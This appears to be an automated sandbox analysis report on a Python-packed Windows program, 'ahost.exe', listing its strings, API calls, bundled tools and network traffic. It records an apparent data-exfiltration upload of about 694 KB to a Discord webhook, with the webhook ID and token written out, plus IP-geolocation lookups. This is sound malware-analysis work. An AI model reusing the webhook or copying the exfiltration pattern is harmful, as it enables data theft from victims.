              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.pdb source: powershell.exe, 00000046.00000002.1646857023.0000017B02BE1000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: ahost.exe, 00000002.00000002.1883107537.00007FF8F9181000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: ahost.exe, 00000002.00000002.1881541299.00007FF8E83E1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: ahost.exe, 00000002.00000002.1881203499.00007FF8E8381000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: ahost.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: ahost.exe, 00000002.00000002.1880925257.00007FF8E824B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: ahost.exe, 00000002.00000002.1882883847.00007FF8F8CA1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.pdbhPh source: powershell.exe, 00000046.00000002.1646857023.0000017B02BE1000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: ahost.exe, 00000002.00000002.1880925257.00007FF8E824B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: ahost.exe, 00000002.00000002.1882291196.00007FF8F7A91000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: ahost.exe, 00000002.00000002.1881902584.00007FF8F0D01000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: ahost.exe, 00000002.00000002.1880634708.00007FF8E8201000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1877729374.00007FF8E72A5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: oh.pdb. source: powershell.exe, 00000046.00000002.1723901604.0000017B19878000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1878181431.00007FF8E72FE000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91E92F0 FindFirstFileExW,FindClose,0_2_00007FF7F91E92F0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91E83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7F91E83B0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92018E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7F92018E4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91E92F0 FindFirstFileExW,FindClose,2_2_00007FF7F91E92F0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91E83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7F91E83B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8A46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,104_2_00007FF7CF8A46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8E88E0 FindFirstFileExA,104_2_00007FF7CF8E88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF89E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,104_2_00007FF7CF89E21C
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-baxwq.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 694040User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=57f85f30d1587e66d117b2081c55215c
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:37:57 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734075478x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwkuEwvKx%2Fy1ZpufbQaAbIFwSVvPWB2fx%2FQ9pTsSali82LoCYBMuZqcL5aSWX3dZcf4tzU3koKglmm0u9v3dMQVCiodA3OWSmeLvvbehvpOqGgYfig7bgGugaUw%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=59db110601c0cdd6f5cf870796f640135c7dbd50-1734075477; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=JEq3usgsc09laeU6BfULN4MDc08M6NykX3r6GGHoWys-1734075477571-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f144aafcf05c340-EWR
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi?Sx
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: ahost.exe, 00000002.00000002.1869730521.000002162BD00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: ahost.exe, 00000002.00000003.1605942422.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1551563607.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871213413.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866866595.000002162C365000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1640893312.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1551563607.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1867424193.000002162C3D6000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1617803880.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871320397.000002162C3DA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 0000000C.00000002.1542004672.000001FBD9982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
              Source: powershell.exe, 0000000C.00000002.1542004672.000001FBD9982000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: svchost.exe, 00000015.00000002.2645655275.0000021787484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: ahost.exe, 00000002.00000003.1413425472.000002162BA38000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: svchost.exe, 00000015.00000003.1476407714.0000021787600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: ahost.exe, 00000002.00000003.1601685173.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C24D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: ahost.exe, 00000002.00000003.1601685173.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C24D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C22F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
